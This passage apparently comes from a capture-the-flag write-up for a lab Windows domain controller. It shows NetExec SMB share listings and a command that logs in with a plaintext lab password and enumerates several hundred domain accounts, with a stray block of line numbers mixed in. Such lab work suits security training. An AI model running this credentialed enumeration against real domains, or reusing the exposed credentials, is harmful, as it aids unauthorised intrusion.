SMB         10.129.229.17   445    DC01             -----           -----------     ------
SMB         10.129.229.17   445    DC01             ADMIN$                          Remote Admin
SMB         10.129.229.17   445    DC01             C$                              Default share
SMB         10.129.229.17   445    DC01             forensic                        Forensic / Audit share.
SMB         10.129.229.17   445    DC01             IPC$            READ            Remote IPC
SMB         10.129.229.17   445    DC01             NETLOGON        READ            Logon server share 
SMB         10.129.229.17   445    DC01             profiles$       READ            
SMB         10.129.229.17   445    DC01             SYSVOL          READ            Logon server share 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
![vmware_pqROSPFvSz](2026-06/vmware_pqROSPFvSz.png)┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb 10.129.229.17 -u 'support' -p '#00^BlackKnight' --users 
SMB         10.129.229.17   445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.229.17   445    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight 
SMB         10.129.229.17   445    DC01             -Username-                    -Last PW Set-       -BadPW- -Description-                                               
SMB         10.129.229.17   445    DC01             Administrator                 2020-02-23 18:09:53 0       Built-in account for administering the computer/domain 
SMB         10.129.229.17   445    DC01             Guest                         2020-06-03 16:18:28 0       Built-in account for guest access to the computer/domain 
SMB         10.129.229.17   445    DC01             krbtgt                        2020-02-23 18:08:31 0       Key Distribution Center Service Account 
SMB         10.129.229.17   445    DC01             audit2020                     2020-09-21 22:35:06 0        
SMB         10.129.229.17   445    DC01             support                       2020-02-23 17:53:23 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD764430              2020-02-23 12:43:18 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD538365              2020-02-23 12:43:20 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD189208              2020-02-23 12:43:21 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD404458              2020-02-23 12:43:23 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD706381              2020-02-23 12:43:24 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD937395              2020-02-23 12:43:25 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD553715              2020-02-23 12:43:27 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD840481              2020-02-23 12:43:28 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD622501              2020-02-23 12:43:30 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD787464              2020-02-23 12:43:31 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD163183              2020-02-23 12:43:33 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD869335              2020-02-23 12:43:35 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD319016              2020-02-23 12:43:36 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD600999              2020-02-23 12:43:38 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD894905              2020-02-23 12:43:39 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD253541              2020-02-23 12:43:41 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD175204              2020-02-23 12:43:42 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD727512              2020-02-23 12:43:44 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD227380              2020-02-23 12:43:45 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD251003              2020-02-23 12:43:47 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD129328              2020-02-23 12:43:49 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD616527              2020-02-23 12:43:50 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD533551              2020-02-23 12:43:51 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD883784              2020-02-23 12:43:53 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD908329              2020-02-23 12:43:55 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD601590              2020-02-23 12:43:56 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD573498              2020-02-23 12:43:58 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD290325              2020-02-23 12:43:59 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD775986              2020-02-23 12:44:00 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD348433              2020-02-23 12:44:02 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD196444              2020-02-23 12:44:03 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD137694              2020-02-23 12:44:05 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD533886              2020-02-23 12:44:06 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD268320              2020-02-23 12:44:07 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD909590              2020-02-23 12:44:09 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD136813              2020-02-23 12:44:10 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD358090              2020-02-23 12:44:12 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD561870              2020-02-23 12:44:13 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD269538              2020-02-23 12:44:14 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD169035              2020-02-23 12:44:16 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD118321              2020-02-23 12:44:17 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD592556              2020-02-23 12:44:19 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD618519              2020-02-23 12:44:20 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD329802              2020-02-23 12:44:22 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD753480              2020-02-23 12:44:23 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD837541              2020-02-23 12:44:24 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD186980              2020-02-23 12:44:26 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD419600              2020-02-23 12:44:27 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD220786              2020-02-23 12:44:30 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD767820              2020-02-23 12:44:31 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD549571              2020-02-23 12:44:33 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD411740              2020-02-23 12:44:40 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD768095              2020-02-23 12:44:57 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD835725              2020-02-23 12:44:58 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD251977              2020-02-23 12:44:59 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD430864              2020-02-23 12:45:00 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD413242              2020-02-23 12:45:01 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD464763              2020-02-23 12:45:02 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD266096              2020-02-23 12:45:03 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD334058              2020-02-23 12:45:04 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD404213              2020-02-23 12:45:06 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD219324              2020-02-23 12:45:07 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD412798              2020-02-23 12:45:08 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD441593              2020-02-23 12:45:09 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD606328              2020-02-23 12:45:10 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD796301              2020-02-23 12:45:11 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD415829              2020-02-23 12:45:12 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD820995              2020-02-23 12:45:13 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD695166              2020-02-23 12:45:14 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD759042              2020-02-23 12:45:15 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD607290              2020-02-23 12:45:16 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD229506              2020-02-23 12:45:17 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD256791              2020-02-23 12:45:18 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD997545              2020-02-23 12:45:19 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD114762              2020-02-23 12:45:20 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD321206              2020-02-23 12:45:21 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD195757              2020-02-23 12:45:22 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD877328              2020-02-23 12:45:23 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD446463              2020-02-23 12:45:24 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD579980              2020-02-23 12:45:25 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD775126              2020-02-23 12:45:26 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD429587              2020-02-23 12:45:27 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD534956              2020-02-23 12:45:28 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD315276              2020-02-23 12:45:29 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD995218              2020-02-23 12:45:30 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD843883              2020-02-23 12:45:31 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD876916              2020-02-23 12:45:32 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD382769              2020-02-23 12:45:33 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD194732              2020-02-23 12:45:34 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD191416              2020-02-23 12:45:35 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD932709              2020-02-23 12:45:36 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD546640              2020-02-23 12:45:37 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD569313              2020-02-23 12:45:38 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD744790              2020-02-23 12:45:39 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD739659              2020-02-23 12:45:40 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD926559              2020-02-23 12:45:41 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD969352              2020-02-23 12:45:42 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD253047              2020-02-23 12:45:43 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD899433              2020-02-23 12:45:44 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD606964              2020-02-23 12:45:45 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD385719              2020-02-23 12:45:46 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD838710              2020-02-23 12:45:47 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD608914              2020-02-23 12:45:48 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD569653              2020-02-23 12:45:50 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD759079              2020-02-23 12:45:51 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD488531              2020-02-23 12:45:51 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD160610              2020-02-23 12:45:52 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD586934              2020-02-23 12:45:53 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD819822              2020-02-23 12:45:55 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD739765              2020-02-23 12:45:55 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD875008              2020-02-23 12:45:56 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD441759              2020-02-23 12:45:57 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD763893              2020-02-23 12:45:59 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD713470              2020-02-23 12:46:00 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD131771              2020-02-23 12:46:01 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD793029              2020-02-23 12:46:02 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD694429              2020-02-23 12:46:03 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD802251              2020-02-23 12:46:04 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD602567              2020-02-23 12:46:05 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD328983              2020-02-23 12:46:06 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD990638              2020-02-23 12:46:07 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD350809              2020-02-23 12:46:08 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD405242              2020-02-23 12:46:09 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD267457              2020-02-23 12:46:10 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD686428              2020-02-23 12:46:11 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD478828              2020-02-23 12:46:12 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD129387              2020-02-23 12:46:13 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD544934              2020-02-23 12:46:14 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD115148              2020-02-23 12:46:15 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD753537              2020-02-23 12:46:16 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD416532              2020-02-23 12:46:17 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD680939              2020-02-23 12:46:18 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD732035              2020-02-23 12:46:19 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD522135              2020-02-23 12:46:21 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD773423              2020-02-23 12:46:22 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD371669              2020-02-23 12:46:24 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD252379              2020-02-23 12:46:25 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD828826              2020-02-23 12:46:26 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD548394              2020-02-23 12:46:27 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD611993              2020-02-23 12:46:28 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD192642              2020-02-23 12:46:29 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD106360              2020-02-23 12:46:30 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD939243              2020-02-23 12:46:32 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD230515              2020-02-23 12:46:33 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD774376              2020-02-23 12:46:34 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD576233              2020-02-23 12:46:35 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD676303              2020-02-23 12:46:36 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD673073              2020-02-23 12:46:37 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD558867              2020-02-23 12:46:38 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD184482              2020-02-23 12:46:39 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD724669              2020-02-23 12:46:40 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD765350              2020-02-23 12:46:41 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD411132              2020-02-23 12:46:43 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD128775              2020-02-23 12:46:44 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD704154              2020-02-23 12:46:45 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD107197              2020-02-23 12:46:46 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD994577              2020-02-23 12:46:47 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD683323              2020-02-23 12:46:48 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD433476              2020-02-23 12:46:49 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD644281              2020-02-23 12:46:50 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD195953              2020-02-23 12:46:51 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD868068              2020-02-23 12:46:52 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD690642              2020-02-23 12:46:53 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD465267              2020-02-23 12:46:54 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD199889              2020-02-23 12:46:55 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD468839              2020-02-23 12:46:56 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD348835              2020-02-23 12:46:57 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD624385              2020-02-23 12:46:58 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD818863              2020-02-23 12:46:59 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD939200              2020-02-23 12:47:00 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD135990              2020-02-23 12:47:01 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD484290              2020-02-23 12:47:02 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD898237              2020-02-23 12:47:03 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD773118              2020-02-23 12:47:04 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD148067              2020-02-23 12:47:05 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD390179              2020-02-23 12:47:06 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD359278              2020-02-23 12:47:08 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD375924              2020-02-23 12:47:09 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD533060              2020-02-23 12:47:10 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD534196              2020-02-23 12:47:11 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD639103              2020-02-23 12:47:12 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD933887              2020-02-23 12:47:13 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD907614              2020-02-23 12:47:15 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD991588              2020-02-23 12:47:15 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD781404              2020-02-23 12:47:17 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD787995              2020-02-23 12:47:18 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD911926              2020-02-23 12:47:19 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD146200              2020-02-23 12:47:20 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD826622              2020-02-23 12:47:21 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD171624              2020-02-23 12:47:22 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD497216              2020-02-23 12:47:23 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD839613              2020-02-23 12:47:24 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD428532              2020-02-23 12:47:26 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD697473              2020-02-23 12:47:27 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD291678              2020-02-23 12:47:28 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD623122              2020-02-23 12:47:29 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD765982              2020-02-23 12:47:30 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD701303              2020-02-23 12:47:31 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD250576              2020-02-23 12:47:32 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD971417              2020-02-23 12:47:33 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD160820              2020-02-23 12:47:34 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD385928              2020-02-23 12:47:35 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD848660              2020-02-23 12:47:36 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD682842              2020-02-23 12:47:37 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD813266              2020-02-23 12:47:38 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD274577              2020-02-23 12:47:39 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD448641              2020-02-23 12:47:40 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD318077              2020-02-23 12:47:41 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD289513              2020-02-23 12:47:42 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD336573              2020-02-23 12:47:43 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD962495              2020-02-23 12:47:44 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD566117              2020-02-23 12:47:45 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD617630              2020-02-23 12:47:47 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD717683              2020-02-23 12:47:48 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD390192              2020-02-23 12:47:49 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD652779              2020-02-23 12:47:50 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD665997              2020-02-23 12:47:51 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD998321              2020-02-23 12:47:52 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD946509              2020-02-23 12:47:53 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD228442              2020-02-23 12:47:54 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD548464              2020-02-23 12:47:55 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD586592              2020-02-23 12:47:56 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD512331              2020-02-23 12:47:57 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD609423              2020-02-23 12:47:58 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD395725              2020-02-23 12:47:59 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD438923              2020-02-23 12:48:00 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD691480              2020-02-23 12:48:02 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD236467              2020-02-23 12:48:03 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD895235              2020-02-23 12:48:04 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD788523              2020-02-23 12:48:05 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD710285              2020-02-23 12:48:07 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD357023              2020-02-23 12:48:08 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD362337              2020-02-23 12:48:09 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD651599              2020-02-23 12:48:10 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD579344              2020-02-23 12:48:11 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD859776              2020-02-23 12:48:12 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD789969              2020-02-23 12:48:13 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD356727              2020-02-23 12:48:14 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD962999              2020-02-23 12:48:15 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD201655              2020-02-23 12:48:16 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD635996              2020-02-23 12:48:17 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD478410              2020-02-23 12:48:18 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD518316              2020-02-23 12:48:19 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD202900              2020-02-23 12:48:20 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD767498              2020-02-23 12:48:21 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD103974              2020-02-23 12:48:22 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD135403              2020-02-23 12:48:23 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD112766              2020-02-23 12:48:24 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD978938              2020-02-23 12:48:25 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD871753              2020-02-23 12:48:26 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD136203              2020-02-23 12:48:27 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD634593              2020-02-23 12:48:28 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD274367              2020-02-23 12:48:29 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD520852              2020-02-23 12:48:30 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD339143              2020-02-23 12:48:31 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD684814              2020-02-23 12:48:32 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD792484              2020-02-23 12:48:33 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD802875              2020-02-23 12:48:34 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD383108              2020-02-23 12:48:35 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD318250              2020-02-23 12:48:36 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD496547              2020-02-23 12:48:37 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD219914              2020-02-23 12:48:38 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD454313              2020-02-23 12:48:39 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD460131              2020-02-23 12:48:41 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD613771              2020-02-23 12:48:42 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD632329              2020-02-23 12:48:43 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD402639              2020-02-23 12:48:44 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD235930              2020-02-23 12:48:45 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD246388              2020-02-23 12:48:46 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD946435              2020-02-23 12:48:47 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD739227              2020-02-23 12:48:48 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD827906              2020-02-23 12:48:49 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD198927              2020-02-23 12:48:50 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD169876              2020-02-23 12:48:51 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD150357              2020-02-23 12:48:52 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD594619              2020-02-23 12:48:53 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD274109              2020-02-23 12:48:54 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD682949              2020-02-23 12:48:55 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD316850              2020-02-23 12:48:56 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD884808              2020-02-23 12:48:57 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD327610              2020-02-23 12:48:58 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD899238              2020-02-23 12:49:00 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD184493              2020-02-23 12:49:01 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD631162              2020-02-23 12:49:02 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD591846              2020-02-23 12:49:03 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD896715              2020-02-23 12:49:03 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD500073              2020-02-23 12:49:05 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD584113              2020-02-23 12:49:06 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD204805              2020-02-23 12:49:07 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD842593              2020-02-23 12:49:08 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD397679              2020-02-23 12:49:09 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD842438              2020-02-23 12:49:10 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD286615              2020-02-23 12:49:11 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD224839              2020-02-23 12:49:12 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD631599              2020-02-23 12:49:13 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD247450              2020-02-23 12:49:14 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD290582              2020-02-23 12:49:15 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD657263              2020-02-23 12:49:16 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD314351              2020-02-23 12:49:17 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD434395              2020-02-23 12:49:18 0        
SMB         10.129.229.17   445    DC01             BLACKFIELD410243              2020-02-23 12:49:19 0        
